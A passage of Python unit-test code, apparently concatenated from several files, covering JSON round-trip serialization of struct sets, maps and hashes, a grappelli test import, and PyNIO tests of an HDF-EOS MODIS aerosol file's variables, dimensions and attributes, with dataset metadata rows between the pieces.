    self.assertEqual(struct2.f8[1], None)
    # f9/f10: nested-struct lists; spot-check representative fields
    self.assertEqual(len(struct2.f9), 2)
    self.assertEqual(struct2.f9[0].f2, True)
    self.assertEqual(struct2.f9[0].f12, 0xFF)
    self.assertEqual(struct2.f9[0].f32, "Initial string!")
    self.assertEqual(struct2.f9[1].f2, True)
    self.assertEqual(struct2.f9[1].f12, 0xFF)
    self.assertEqual(struct2.f9[1].f32, "Initial string!")
    self.assertEqual(len(struct2.f10), 2)
    self.assertNotEqual(struct2.f10[0], None)
    self.assertEqual(struct2.f10[0].f2, True)
    self.assertEqual(struct2.f10[0].f12, 0xFF)
    self.assertEqual(struct2.f10[0].f32, "Initial string!")
    self.assertEqual(struct2.f10[1], None)
def test_serialization_json_struct_set(self):
    """Round-trip test.StructSet through JSON.

    Set containers are order-free, so the checks use membership
    (``in``) rather than indexing: scalar, enum, flag and
    nested-struct sets must all contain the expected members after
    serialize + deserialize.
    """
    # Define a source JSON string
    json = r'{"f1":[48,65,97],"f2":[1,2],"f3":[3,7],"f4":[{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146299848353000,"f36":"00000000-0000-0000-0000-000000000000","f37":"89e4edd0-f0a7-11e8-9dde-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146299848966000,"f36":"00000000-0000-0000-0000-000000000000","f37":"89e503f6-f0a7-11e8-9dde-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}]}'
    # Create a new struct from the source JSON string
    struct1 = test.StructSet.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructSet.from_json(json)
    # f1: scalar set membership
    self.assertEqual(len(struct2.f1), 3)
    self.assertTrue(48 in struct2.f1)
    self.assertTrue(65 in struct2.f1)
    self.assertTrue(97 in struct2.f1)
    # f2: enum set membership
    self.assertEqual(len(struct2.f2), 2)
    self.assertTrue(test.EnumSimple.ENUM_VALUE_1 in struct2.f2)
    self.assertTrue(test.EnumSimple.ENUM_VALUE_2 in struct2.f2)
    # f3: flag (bitmask) set membership
    self.assertEqual(len(struct2.f3), 2)
    self.assertTrue((test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2) in struct2.f3)
    self.assertTrue((test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3) in struct2.f3)
    # f4: nested-struct set — membership keyed by struct id
    # (relies on StructSimple equality/hash using the id field)
    self.assertEqual(len(struct2.f4), 2)
    s1 = test.StructSimple()
    s1.id = 48
    self.assertTrue(s1 in struct2.f4)
    s2 = test.StructSimple()
    s2.id = 65
    self.assertTrue(s2 in struct2.f4)
def test_serialization_json_struct_map(self):
    """Round-trip test.StructMap through JSON.

    Map containers are keyed by the strings "10" and "20"; both keys
    must survive serialize + deserialize for scalar, byte-sequence,
    enum, flag and nested-struct value types, with null values
    preserved in the optional variants.
    """
    # Define a source JSON string
    json = r'{"f1":{"10":48,"20":65},"f2":{"10":97,"20":null},"f3":{"10":"MDAw","20":"QUFB"},"f4":{"10":"YWFh","20":null},"f5":{"10":1,"20":2},"f6":{"10":1,"20":null},"f7":{"10":3,"20":7},"f8":{"10":3,"20":null},"f9":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345803483000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a549215e-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345804184000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a54942ce-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}},"f10":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146345803483000,"f36":"00000000-0000-0000-0000-000000000000","f37":"a549215e-f0a7-11e8-90f6-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":null}}'
    # Create a new struct from the source JSON string
    struct1 = test.StructMap.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructMap.from_json(json)
    # f1/f2: scalar maps; the optional map keeps its null value
    self.assertEqual(len(struct2.f1), 2)
    self.assertEqual(struct2.f1["10"], 48)
    self.assertEqual(struct2.f1["20"], 65)
    self.assertEqual(len(struct2.f2), 2)
    self.assertEqual(struct2.f2["10"], 97)
    self.assertEqual(struct2.f2["20"], None)
    # f3/f4: byte-sequence maps (3-byte values)
    self.assertEqual(len(struct2.f3), 2)
    self.assertEqual(len(struct2.f3["10"]), 3)
    self.assertEqual(len(struct2.f3["20"]), 3)
    self.assertEqual(len(struct2.f4), 2)
    self.assertEqual(len(struct2.f4["10"]), 3)
    self.assertEqual(struct2.f4["20"], None)
    # f5/f6: enum maps, plain and optional
    self.assertEqual(len(struct2.f5), 2)
    self.assertEqual(struct2.f5["10"], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f5["20"], test.EnumSimple.ENUM_VALUE_2)
    self.assertEqual(len(struct2.f6), 2)
    self.assertEqual(struct2.f6["10"], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f6["20"], None)
    # f7/f8: flag (bitmask) maps, plain and optional
    self.assertEqual(len(struct2.f7), 2)
    self.assertEqual(struct2.f7["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f7["20"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
    self.assertEqual(len(struct2.f8), 2)
    self.assertEqual(struct2.f8["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f8["20"], None)
    # f9/f10: nested-struct maps, identified by their id field
    self.assertEqual(len(struct2.f9), 2)
    self.assertEqual(struct2.f9["10"].id, 48)
    self.assertEqual(struct2.f9["20"].id, 65)
    self.assertEqual(len(struct2.f10), 2)
    self.assertEqual(struct2.f10["10"].id, 48)
    self.assertEqual(struct2.f10["20"], None)
def test_serialization_json_struct_hash(self):
    """Round-trip test.StructHash through JSON.

    Mirrors the map test against the hash-based container struct:
    string keys "10"/"20" with scalar, byte-sequence, enum, flag and
    nested-struct value types, null values preserved in the optional
    variants.
    """
    # Define a source JSON string
    json = r'{"f1":{"10":48,"20":65},"f2":{"10":97,"20":null},"f3":{"10":"MDAw","20":"QUFB"},"f4":{"10":"YWFh","20":null},"f5":{"10":1,"20":2},"f6":{"10":1,"20":null},"f7":{"10":3,"20":7},"f8":{"10":3,"20":null},"f9":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381450913000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba8885d2-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":{"id":65,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381452825000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba88ced4-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}}},"f10":{"10":{"id":48,"f1":false,"f2":true,"f3":0,"f4":255,"f5":0,"f6":33,"f7":0,"f8":1092,"f9":0,"f10":127,"f11":0,"f12":255,"f13":0,"f14":32767,"f15":0,"f16":65535,"f17":0,"f18":2147483647,"f19":0,"f20":4294967295,"f21":0,"f22":9223372036854775807,"f23":0,"f24":18446744073709551615,"f25":0.0,"f26":123.456,"f27":0.0,"f28":-1.23456e+125,"f29":"0.0","f30":"123456.123456","f31":"","f32":"Initial string!","f33":0,"f34":0,"f35":1543146381450913000,"f36":"00000000-0000-0000-0000-000000000000","f37":"ba8885d2-f0a7-11e8-81fa-ac220bcdd8e0","f38":"123e4567-e89b-12d3-a456-426655440000","f39":0,"f40":0,"f41":{"id":0,"symbol":"","side":0,"type":0,"price":0.0,"volume":0.0},"f42":{"currency":"","amount":0.0},"f43":0,"f44":{"id":0,"name":"","state":11,"wallet":{"currency":"","amount":0.0},"asset":null,"orders":[]}},"20":null}}'
    # Create a new struct from the source JSON string
    struct1 = test.StructHash.from_json(json)
    # Serialize the struct to the JSON string
    json = struct1.to_json()
    # Check the serialized JSON size
    self.assertGreater(len(json), 0)
    # Deserialize the struct from the JSON string
    struct2 = test.StructHash.from_json(json)
    # f1/f2: scalar hashes; the optional hash keeps its null value
    self.assertEqual(len(struct2.f1), 2)
    self.assertEqual(struct2.f1["10"], 48)
    self.assertEqual(struct2.f1["20"], 65)
    self.assertEqual(len(struct2.f2), 2)
    self.assertEqual(struct2.f2["10"], 97)
    self.assertEqual(struct2.f2["20"], None)
    # f3/f4: byte-sequence hashes (3-byte values)
    self.assertEqual(len(struct2.f3), 2)
    self.assertEqual(len(struct2.f3["10"]), 3)
    self.assertEqual(len(struct2.f3["20"]), 3)
    self.assertEqual(len(struct2.f4), 2)
    self.assertEqual(len(struct2.f4["10"]), 3)
    self.assertEqual(struct2.f4["20"], None)
    # f5/f6: enum hashes, plain and optional
    self.assertEqual(len(struct2.f5), 2)
    self.assertEqual(struct2.f5["10"], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f5["20"], test.EnumSimple.ENUM_VALUE_2)
    self.assertEqual(len(struct2.f6), 2)
    self.assertEqual(struct2.f6["10"], test.EnumSimple.ENUM_VALUE_1)
    self.assertEqual(struct2.f6["20"], None)
    # f7/f8: flag (bitmask) hashes, plain and optional
    self.assertEqual(len(struct2.f7), 2)
    self.assertEqual(struct2.f7["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f7["20"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2 | test.FlagsSimple.FLAG_VALUE_3)
    self.assertEqual(len(struct2.f8), 2)
    self.assertEqual(struct2.f8["10"], test.FlagsSimple.FLAG_VALUE_1 | test.FlagsSimple.FLAG_VALUE_2)
    self.assertEqual(struct2.f8["20"], None)
    # f9/f10: nested-struct hashes, identified by their id field
    self.assertEqual(len(struct2.f9), 2)
    self.assertEqual(struct2.f9["10"].id, 48)
    self.assertEqual(struct2.f9["20"].id, 65)
    self.assertEqual(len(struct2.f10), 2)
    self.assertEqual(struct2.f10["10"].id, 48)
    self.assertEqual(struct2.f10["20"], None)
| 69.289157
| 4,381
| 0.65706
| 9,482
| 69,012
| 4.76081
| 0.036807
| 0.233596
| 0.289487
| 0.05702
| 0.946657
| 0.917771
| 0.910084
| 0.893602
| 0.891387
| 0.889881
| 0
| 0.221156
| 0.140439
| 69,012
| 995
| 4,382
| 69.358794
| 0.539835
| 0.030473
| 0
| 0.858633
| 0
| 0.011587
| 0.33448
| 0.328063
| 0
| 0
| 0.004128
| 0
| 0.922364
| 1
| 0.012746
| false
| 0
| 0.008111
| 0
| 0.022016
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
d1bd081f05c2bdd6057d4c73879864de86744445
| 105
|
py
|
Python
|
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
static/tests/__init__.py
|
jared-wallace/jared-wallace.com
|
af58635d18f394906b6a0125eb4573f89546d7d5
|
[
"WTFPL"
] | null | null | null |
from grappelli.tests.test_related import RelatedTests
from grappelli.tests.test_switch import SwitchTests
| 52.5
| 53
| 0.895238
| 14
| 105
| 6.571429
| 0.642857
| 0.282609
| 0.391304
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 105
| 2
| 54
| 52.5
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d1d3b38f60f369d00e32a442fd5a53ae17fc9d9c
| 69,100
|
py
|
Python
|
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
test/test_hdfeos.py
|
briandobbins/pynio
|
1dd5fc0fc133f2b8d329ae68929bd3c6c1c5fa7c
|
[
"Apache-2.0"
] | null | null | null |
import Nio
import numpy as np
import numpy.testing as nt
import os
import unittest as ut
# Path of the HDF-EOS granule under test, relative to this test file's
# directory (resolved in Test.setUp below).
file_to_test = '../ncarg/data/hdfeos/MOD04_L2.A2001066.0000.004.2003078090622.hdfeos'
class Test(ut.TestCase):
    """Checks a known HDF-EOS granule opened via Nio against expected
    metadata and per-variable statistics.

    Expected values come from the module-level fixtures
    (``file_variables``, ``file_attributes``, ``file_dimensions``,
    ``var_*``) defined alongside this class.
    """

    def setUp(self):
        # Resolve the data file relative to this test module and open it.
        here = os.path.dirname(__file__)
        self.f = Nio.open_file(os.path.realpath(os.path.join(here, file_to_test)))

    def _assert_stat(self, actual, expected):
        """Compare one statistic: masked values compare by masked-ness,
        everything else compares numerically (almost-equal)."""
        if np.ma.is_masked(actual) or np.ma.is_masked(expected):
            nt.assert_equal(np.ma.is_masked(actual), np.ma.is_masked(expected))
        else:
            nt.assert_almost_equal(actual, expected)

    def test_hdfeos_variables(self):
        # The file must expose exactly the expected variable names.
        nt.assert_equal(set(self.f.variables.keys()), set(file_variables))

    def test_hdfeos_attributes(self):
        nt.assert_equal(self.f.attributes, file_attributes)

    def test_hdfeos_dimensions(self):
        nt.assert_equal(self.f.dimensions, file_dimensions)

    def test_hdfeos_var_shapes(self):
        for name, var_obj in self.f.variables.items():
            nt.assert_equal(var_obj.shape, var_shapes[name])

    def test_hdfeos_var_attributes(self):
        for name, var_obj in self.f.variables.items():
            nt.assert_equal(var_obj.attributes, var_attributes[name])

    def test_hdfeos_var_dimensions(self):
        for name, var_obj in self.f.variables.items():
            nt.assert_equal(var_obj.dimensions, var_dimensions[name])

    def test_hdfeos_var_coordinates(self):
        for name, var_obj in self.f.variables.items():
            nt.assert_equal(get_coord_dims(var_obj), var_coordinates[name])

    def test_hdfeos_var_values(self):
        # var_values[name] is (min, max, mean, masked-count).
        for name in var_values:
            data = self.f.variables[name].get_value()
            expected = var_values[name]
            self._assert_stat(data.min(), expected[0])
            self._assert_stat(data.max(), expected[1])
            self._assert_stat(data.mean(), expected[2])
            nt.assert_almost_equal(np.ma.count_masked(data), expected[3])
# Expected global attributes: this HDF-EOS file defines none.
file_attributes = {}
# Expected dimension name -> size for the MOD04 swath.
file_dimensions = {'Cell_Along_Swath_mod04': 203, 'Cell_Across_Swath_mod04': 135, 'Solution_1_Land_mod04': 2, 'Solution_2_Land_mod04': 3, 'Solution_3_Land_mod04': 3, 'Solution_Ocean_mod04': 2, 'Solution_Index_mod04': 9, 'MODIS_Band_Land_mod04': 5, 'MODIS_Band_Ocean_mod04': 7, 'QA_Byte_Land_mod04': 5, 'QA_Byte_Ocean_mod04': 5}
# Expected variable names (compared as a set in test_hdfeos_variables).
file_variables = ['MODIS_Band_Ocean_mod04', 'MODIS_Band_Land_mod04', 'Solution_Index_mod04', 'Solution_Ocean_mod04', 'Solution_3_Land_mod04', 'Solution_2_Land_mod04', 'Solution_1_Land_mod04', 'Quality_Assurance_Ocean_mod04', 'STD_Reflectance_Ocean_mod04', 'Mean_Reflectance_Ocean_mod04', 'Number_Pixels_Used_Ocean_mod04', 'Cloud_Fraction_Ocean_mod04', 'Optical_Depth_by_models_ocean_mod04', 'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04', 'Least_Squares_Error_Ocean_mod04', 'Transmitted_Flux_Average_Ocean_mod04', 'Transmitted_Flux_Best_Ocean_mod04', 'Reflected_Flux_Average_Ocean_mod04', 'Reflected_Flux_Best_Ocean_mod04', 'Angstrom_Exponent_2_Ocean_mod04', 'Angstrom_Exponent_1_Ocean_mod04', 'Backscattering_Ratio_Average_Ocean_mod04', 'Backscattering_Ratio_Best_Ocean_mod04', 'Asymmetry_Factor_Average_Ocean_mod04', 'Asymmetry_Factor_Best_Ocean_mod04', 'Cloud_Condensation_Nuclei_Ocean_mod04', 'Effective_Radius_Ocean_mod04', 'Mass_Concentration_Ocean_mod04', 'Optical_Depth_Large_Average_Ocean_mod04', 'Optical_Depth_Large_Best_Ocean_mod04', 'Optical_Depth_Small_Average_Ocean_mod04', 'Optical_Depth_Small_Best_Ocean_mod04', 'Effective_Optical_Depth_Average_Ocean_mod04', 'Effective_Optical_Depth_Best_Ocean_mod04', 'Solution_Index_Ocean_Large_mod04', 'Solution_Index_Ocean_Small_mod04', 'Quality_Assurance_Crit_Ref_Land_mod04', 'Quality_Assurance_Land_mod04', 'STD_Reflectance_Land_mod04', 'Mean_Reflectance_Land_mod04', 'Number_Pixels_Percentile_Land_mod04', 'Optical_Depth_Ratio_Small_Land_mod04', 'Cloud_Fraction_Land_mod04', 'Transmitted_Flux_Land_mod04', 'Reflected_Flux_Land_mod04', 'Angstrom_Exponent_Land_mod04', 'Mass_Concentration_Land_mod04', 'Estimated_Uncertainty_Land_mod04', 'Corrected_Optical_Depth_Land_mod04', 'Continental_Optical_Depth_Land_mod04', 'Aerosol_Type_Land_mod04', 'QualityWeight_Critical_Reflectance_Land_mod04', 'QualityWeight_Path_Radiance_Land_mod04', 'Error_Critical_Reflectance_Land_mod04', 'Critical_Reflectance_Land_mod04', 
'Error_Path_Radiance_Land_mod04', 'Path_Radiance_Land_mod04', 'Standard_Deviation_Reflectance_Land_All_mod04', 'Mean_Reflectance_Land_All_mod04', 'Reflected_Flux_Land_And_Ocean_mod04', 'Optical_Depth_Ratio_Small_Land_And_Ocean_mod04', 'Optical_Depth_Land_And_Ocean_mod04', 'Scattering_Angle_mod04', 'Cloud_Mask_QA_mod04', 'Sensor_Azimuth_mod04', 'Sensor_Zenith_mod04', 'Solar_Azimuth_mod04', 'Solar_Zenith_mod04', 'Scan_Start_Time_mod04', 'Latitude_mod04', 'Longitude_mod04']
var_attributes = {'MODIS_Band_Ocean_mod04': {'hdfeos_name': 'MODIS_Band_Ocean'},
'MODIS_Band_Land_mod04': {'hdfeos_name': 'MODIS_Band_Land'},
'Solution_Index_mod04': {'hdfeos_name': 'Solution_Index'},
'Solution_Ocean_mod04': {'hdfeos_name': 'Solution_Ocean'},
'Solution_3_Land_mod04': {'hdfeos_name': 'Solution_3_Land'},
'Solution_2_Land_mod04': {'hdfeos_name': 'Solution_2_Land'},
'Solution_1_Land_mod04': {'hdfeos_name': 'Solution_1_Land'},
'Quality_Assurance_Ocean_mod04': {'hdfeos_name': 'Quality_Assurance_Ocean', '_FillValue': np.array([0], dtype=np.int8), 'valid_range': np.array([ 0, -1], dtype=np.int8), 'Geolocation_Pointer': 'Internal geolocation arrays', 'description': '(see MODIS atmosphere QA plan for details)', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Run time QA flags'},
'STD_Reflectance_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'STD_Reflectance_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 20000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Standard devaition of reflectances at 7 bands'},
'Mean_Reflectance_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Mean_Reflectance_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 10000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([9.999999747378751e-05]), 'units': 'None', 'long_name': 'Mean reflectances at 7 bands'},
'Number_Pixels_Used_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Number_Pixels_Used_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 1, 400], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Number of Pixels used for 0.55 micron'},
'Cloud_Fraction_Ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Cloud_Fraction_Ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 100], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([1.]), 'units': 'None', 'long_name': 'Cloud_Fraction in percentage'},
'Optical_Depth_by_models_ocean_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_by_models_ocean', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 5000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'optical depth for small and large modes placed in model index'},
'Optical_Depth_Ratio_Small_Ocean_0_86micron_mod04': {'coordinates': 'Latitude_mod04, Longitude_mod04', 'hdfeos_name': 'Optical_Depth_Ratio_Small_Ocean_0.86micron', '_FillValue': np.array([-9999], dtype=np.int16), 'valid_range': np.array([ 0, 1000], dtype=np.int16), 'Geolocation_Pointer': 'Internal geolocation arrays', 'Cell_Along_Swath_Sampling': np.array([ 5, 2025, 10], dtype=np.int32), 'Cell_Across_Swath_Sampling': np.array([ 5, 1345, 10], dtype=np.int32), 'Parameter_Type': 'Output', 'add_offset': np.array([0.]), 'scale_factor': np.array([.0010000000474974512]), 'units': 'None', 'long_name': 'Ratio of small mode optical depth at 0.86 micron'},
